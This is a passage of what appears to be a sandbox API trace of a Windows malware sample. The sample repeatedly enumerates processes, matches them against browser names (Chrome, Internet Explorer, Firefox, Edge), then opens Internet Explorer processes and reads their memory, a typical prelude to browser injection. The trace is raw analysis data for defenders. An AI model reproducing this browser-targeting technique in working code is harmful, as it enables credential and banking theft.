	[0222.432] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.432] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.433] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0222.433] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x5404
	[0222.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.434] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0222.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.434] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.434] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0222.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.434] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.435] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0222.435] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x5408
	[0222.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.435] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0222.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.436] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.436] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0222.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.436] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.436] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0222.437] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x540c
	[0222.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.437] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0222.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.438] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.438] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0222.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.439] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.439] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0222.440] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x5410
	[0222.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.440] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0222.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.440] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.452] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0222.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.453] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.453] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0222.454] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x5414
	[0222.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.454] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0222.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.455] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.455] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0222.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.456] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.456] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0222.457] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x5418
	[0222.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.457] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0222.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.458] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.458] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0222.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.459] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.459] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0222.460] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x541c
	[0222.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.460] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0222.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.461] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.461] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0222.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.462] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.462] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0222.463] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x5420
	[0222.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.463] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0222.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.464] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0222.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.464] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0222.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.464] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.464] NtQueryInformationProcess (in: ProcessHandle=0x5420, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0222.465] ReadProcessMemory (in: hProcess=0x5420, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0222.465] ReadProcessMemory (in: hProcess=0x5420, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0222.465] ReadProcessMemory (in: hProcess=0x5420, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0222.465] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0222.465] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0222.466] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x5424
	[0222.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.466] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0222.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.466] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0222.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.466] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0222.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.467] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.467] NtQueryInformationProcess (in: ProcessHandle=0x5424, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0222.467] ReadProcessMemory (in: hProcess=0x5424, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0222.467] ReadProcessMemory (in: hProcess=0x5424, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0222.467] ReadProcessMemory (in: hProcess=0x5424, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0222.467] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0222.467] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0222.468] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x5428
	[0222.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.468] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0222.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.469] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.469] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0222.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.469] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.469] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0222.470] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x542c
	[0222.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.470] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0222.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.471] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.471] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0222.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.471] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.472] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.472] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x5430
	[0222.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.473] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.473] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.473] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.474] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.474] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.475] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.475] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x5434
	[0222.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.475] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.476] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.476] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.476] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.477] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.477] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x5438
	[0222.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.477] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.478] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.478] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.478] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.479] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0222.479] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x543c
	[0222.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.479] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0222.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.480] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.480] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0222.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.480] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.481] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0
	[0222.481] CloseHandle (hObject=0x4fd0) returned 1
	[0222.481] Sleep (dwMilliseconds=0x64) 
	[0222.582] GetCurrentProcessId () returned 0x110
	[0222.582] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0222.588] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0222.590] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0222.592] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0222.594] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x5440
	[0222.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.594] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0222.595] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.595] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.595] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.596] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0222.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.596] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.597] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0222.598] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x5444
	[0222.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.598] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0222.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.598] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.599] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0222.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.599] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.599] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0222.600] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x5448
	[0222.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.600] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0222.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.600] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.601] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0222.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.601] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.601] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0222.602] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x544c
	[0222.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.602] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0222.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.603] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.603] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0222.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.603] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.603] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0222.604] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x5450
	[0222.604] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.604] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0222.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.605] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.605] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0222.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.605] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.606] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0222.606] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x5454
	[0222.606] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.606] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0222.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.607] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.607] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0222.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.607] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.608] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
